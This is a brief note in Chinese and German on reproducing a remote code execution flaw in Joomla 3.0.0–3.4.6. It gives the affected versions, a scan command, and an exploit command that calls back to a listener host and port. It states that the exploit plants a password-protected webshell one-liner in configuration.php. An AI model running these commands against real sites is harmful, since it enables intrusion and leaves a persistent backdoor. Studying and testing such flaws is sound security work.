
影响范围:3.0.0-3.4.6
Betroffene Versionen: 3.0.0-3.4.6
python3 Joomla-3.4.6-RCE.py -t http://172.20.10.4
Wird „Vulnerable“ angezeigt, ist die Schwachstelle vorhanden.
python3 test.py -t http://127.0.0.1:8080/ --exploit --lhost 192.168.31.126 --lport 2121
Ausführung erfolgreich
Anschließend wird ein Webshell-Einzeiler mit zufälligem Passwort in die „configuration.php“ geschrieben.